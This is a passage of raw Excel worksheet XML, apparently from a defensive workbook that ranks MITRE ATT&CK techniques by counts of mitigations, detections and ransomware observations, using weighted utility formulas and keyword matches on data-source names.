        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z132">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>29</v>
      </c>
      <c r="AA132">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.28999999999999998</v>
      </c>
      <c r="AB132">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.28999999999999998</v>
      </c>
      <c r="AC132" s="29" t="s">
        <v>117</v>
      </c>
      <c r="AD132" s="25" t="str" cm="1">
        <f t="array" ref="AD132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC132)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE132" s="25">
        <f>IF(AD132="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF132" s="25" t="str" cm="1">
        <f t="array" ref="AF132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG132" s="25">
        <f>IF(AF132="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH132" s="25" t="str" cm="1">
        <f t="array" ref="AH132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI132" s="25">
        <f>IF(AH132="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ132" s="25" t="str" cm="1">
        <f t="array" ref="AJ132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK132" s="25">
        <f>IF(AJ132="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL132" s="25" t="str" cm="1">
        <f t="array" ref="AL132">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC132)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM132" s="25">
        <f>IF(AL132="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN132" s="59">
        <v>1</v>
      </c>
      <c r="AO132" s="51">
        <v>1</v>
      </c>
      <c r="AP132" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.0380952380952381E-2</v>
      </c>
      <c r="AQ132" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.19015873015873017</v>
      </c>
      <c r="AR132" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.19015873015873017</v>
      </c>
      <c r="AS132" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT132" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU13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33" spans="1:47" ht="32.1">
      <c r="A133" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.6033333333333332E-2</v>
      </c>
      <c r="B133" s="25">
        <f>SUM(H133,M133,V133)*(1+SUM(AE133,AG133,AI133,AK133,AM133))</f>
        <v>0.627</v>
      </c>
      <c r="C133" s="25" t="s">
        <v>617</v>
      </c>
      <c r="D133" s="25" t="s">
        <v>353</v>
      </c>
      <c r="E133" s="25" t="s">
        <v>618</v>
      </c>
      <c r="F133" s="51">
        <v>1</v>
      </c>
      <c r="G133" s="51">
        <v>1</v>
      </c>
      <c r="H133" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I133">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J133">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K133">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L133">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M133" s="25">
        <v>0</v>
      </c>
      <c r="N133" s="51">
        <v>0</v>
      </c>
      <c r="O133" s="51">
        <v>1</v>
      </c>
      <c r="P133" s="51">
        <v>1</v>
      </c>
      <c r="Q133" s="51">
        <v>8</v>
      </c>
      <c r="R133" s="52" t="s">
        <v>619</v>
      </c>
      <c r="S133" s="51">
        <v>12</v>
      </c>
      <c r="T133" s="51" t="s">
        <v>620</v>
      </c>
      <c r="U133" s="51">
        <v>22</v>
      </c>
      <c r="V133" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.37142857142857144</v>
      </c>
      <c r="W133">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>34</v>
      </c>
      <c r="X133">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.61818181818181817</v>
      </c>
      <c r="Y133">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.61818181818181817</v>
      </c>
      <c r="Z133">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA133">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB133">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC133" s="29" t="s">
        <v>621</v>
      </c>
      <c r="AD133" s="25" t="str" cm="1">
        <f t="array" ref="AD133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC133)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE133" s="25">
        <f>IF(AD133="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF133" s="25" t="str" cm="1">
        <f t="array" ref="AF133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC133)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG133" s="25">
        <f>IF(AF133="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH133" s="25" t="str" cm="1">
        <f t="array" ref="AH133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC133)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI133" s="25">
        <f>IF(AH133="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ133" s="25" t="str" cm="1">
        <f t="array" ref="AJ133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC133)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK133" s="25">
        <f>IF(AJ133="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL133" s="25" t="str" cm="1">
        <f t="array" ref="AL133">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC133)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM133" s="25">
        <f>IF(AL133="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN133" s="52">
        <v>1</v>
      </c>
      <c r="AO133" s="51">
        <v>1</v>
      </c>
      <c r="AP133" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.6033333333333332E-2</v>
      </c>
      <c r="AQ133" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20899999999999999</v>
      </c>
      <c r="AR133" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20899999999999999</v>
      </c>
      <c r="AS133" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT133" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU13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34" spans="1:47" ht="48">
      <c r="A134" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9810476190476191E-2</v>
      </c>
      <c r="B134" s="25">
        <f>SUM(H134,M134,V134)*(1+SUM(AE134,AG134,AI134,AK134,AM134))</f>
        <v>0.56477142857142859</v>
      </c>
      <c r="C134" s="25" t="s">
        <v>622</v>
      </c>
      <c r="D134" s="25" t="s">
        <v>623</v>
      </c>
      <c r="E134" s="25" t="s">
        <v>624</v>
      </c>
      <c r="F134" s="51">
        <v>1</v>
      </c>
      <c r="G134" s="51">
        <v>1</v>
      </c>
      <c r="H134" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I134">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J134">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K134">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L134">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M134" s="25">
        <v>0</v>
      </c>
      <c r="N134" s="51">
        <v>0</v>
      </c>
      <c r="O134" s="51">
        <v>0</v>
      </c>
      <c r="P134" s="51">
        <v>0</v>
      </c>
      <c r="Q134" s="51">
        <v>0</v>
      </c>
      <c r="R134" s="52" t="s">
        <v>625</v>
      </c>
      <c r="S134" s="51">
        <v>15</v>
      </c>
      <c r="T134" s="52" t="s">
        <v>626</v>
      </c>
      <c r="U134" s="51">
        <v>24</v>
      </c>
      <c r="V134" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.37142857142857144</v>
      </c>
      <c r="W134">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>39</v>
      </c>
      <c r="X134">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Y134">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Z134">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA134">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB134">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC134" s="29" t="s">
        <v>371</v>
      </c>
      <c r="AD134" s="25" t="str" cm="1">
        <f t="array" ref="AD134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC134)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE134" s="25">
        <f>IF(AD134="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF134" s="25" t="str" cm="1">
        <f t="array" ref="AF134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC134)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG134" s="25">
        <f>IF(AF134="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH134" s="25" t="str" cm="1">
        <f t="array" ref="AH134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC134)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI134" s="25">
        <f>IF(AH134="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ134" s="25" t="str" cm="1">
        <f t="array" ref="AJ134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC134)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK134" s="25">
        <f>IF(AJ134="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL134" s="25" t="str" cm="1">
        <f t="array" ref="AL134">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC134)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM134" s="25">
        <f>IF(AL134="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN134" s="52">
        <v>1</v>
      </c>
      <c r="AO134" s="51">
        <v>1</v>
      </c>
      <c r="AP134" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9810476190476191E-2</v>
      </c>
      <c r="AQ134" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18825714285714287</v>
      </c>
      <c r="AR134" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18825714285714287</v>
      </c>
      <c r="AS134" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT134" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU13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35" spans="1:47" ht="48">
      <c r="A135" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2699999999999992E-2</v>
      </c>
      <c r="B135" s="25">
        <f>SUM(H135,M135,V135)*(1+SUM(AE135,AG135,AI135,AK135,AM135))</f>
        <v>0.627</v>
      </c>
      <c r="C135" s="25" t="s">
        <v>627</v>
      </c>
      <c r="D135" s="25" t="s">
        <v>623</v>
      </c>
      <c r="E135" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F135" s="51">
        <v>1</v>
      </c>
      <c r="G135" s="51">
        <v>1</v>
      </c>
      <c r="H135" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I135">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J135">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K135">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L135">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M135" s="25">
        <v>0</v>
      </c>
      <c r="N135" s="51">
        <v>0</v>
      </c>
      <c r="O135" s="51">
        <v>0</v>
      </c>
      <c r="P135" s="51">
        <v>0</v>
      </c>
      <c r="Q135" s="51">
        <v>0</v>
      </c>
      <c r="R135" s="52" t="s">
        <v>625</v>
      </c>
      <c r="S135" s="51">
        <v>15</v>
      </c>
      <c r="T135" s="52" t="s">
        <v>626</v>
      </c>
      <c r="U135" s="51">
        <v>24</v>
      </c>
      <c r="V135" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.37142857142857144</v>
      </c>
      <c r="W135">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>39</v>
      </c>
      <c r="X135">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Y135">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Z135">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA135">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB135">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC135" s="29" t="s">
        <v>628</v>
      </c>
      <c r="AD135" s="25" t="str" cm="1">
        <f t="array" ref="AD135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC135)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE135" s="25">
        <f>IF(AD135="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF135" s="25" t="str" cm="1">
        <f t="array" ref="AF135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC135)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG135" s="25">
        <f>IF(AF135="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH135" s="25" t="str" cm="1">
        <f t="array" ref="AH135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC135)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI135" s="25">
        <f>IF(AH135="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ135" s="25" t="str" cm="1">
        <f t="array" ref="AJ135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC135)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK135" s="25">
        <f>IF(AJ135="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL135" s="25" t="str" cm="1">
        <f t="array" ref="AL135">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC135)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM135" s="25">
        <f>IF(AL135="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN135" s="60">
        <v>0</v>
      </c>
      <c r="AO135" s="51">
        <v>0</v>
      </c>
      <c r="AP135" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2699999999999992E-2</v>
      </c>
      <c r="AQ135" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20899999999999999</v>
      </c>
      <c r="AR135" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20899999999999999</v>
      </c>
      <c r="AS135" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT135" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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36" spans="1:47" ht="32.1">
      <c r="A136" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6477142857142858E-2</v>
      </c>
      <c r="B136" s="25">
        <f>SUM(H136,M136,V136)*(1+SUM(AE136,AG136,AI136,AK136,AM136))</f>
        <v>0.56477142857142859</v>
      </c>
      <c r="C136" s="25" t="s">
        <v>629</v>
      </c>
      <c r="D136" s="25" t="s">
        <v>623</v>
      </c>
      <c r="E136" s="25" t="s">
        <v>630</v>
      </c>
      <c r="F136" s="51">
        <v>1</v>
      </c>
      <c r="G136" s="51">
        <v>1</v>
      </c>
      <c r="H136" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I136">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J136">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K136">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L136">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M136" s="25">
        <v>0</v>
      </c>
      <c r="N136" s="51">
        <v>0</v>
      </c>
      <c r="O136" s="51">
        <v>0</v>
      </c>
      <c r="P136" s="51">
        <v>0</v>
      </c>
      <c r="Q136" s="51">
        <v>0</v>
      </c>
      <c r="R136" s="52" t="s">
        <v>625</v>
      </c>
      <c r="S136" s="51">
        <v>15</v>
      </c>
      <c r="T136" s="52" t="s">
        <v>626</v>
      </c>
      <c r="U136" s="51">
        <v>24</v>
      </c>
      <c r="V136" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.37142857142857144</v>
      </c>
      <c r="W136">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>39</v>
      </c>
      <c r="X136">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Y136">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.70909090909090911</v>
      </c>
      <c r="Z136">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA136">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB136">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC136" s="29" t="s">
        <v>631</v>
      </c>
      <c r="AD136" s="25" t="str" cm="1">
        <f t="array" ref="AD136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC136)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE136" s="25">
        <f>IF(AD136="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF136" s="25" t="str" cm="1">
        <f t="array" ref="AF136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG136" s="25">
        <f>IF(AF136="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH136" s="25" t="str" cm="1">
        <f t="array" ref="AH136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI136" s="25">
        <f>IF(AH136="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ136" s="25" t="str" cm="1">
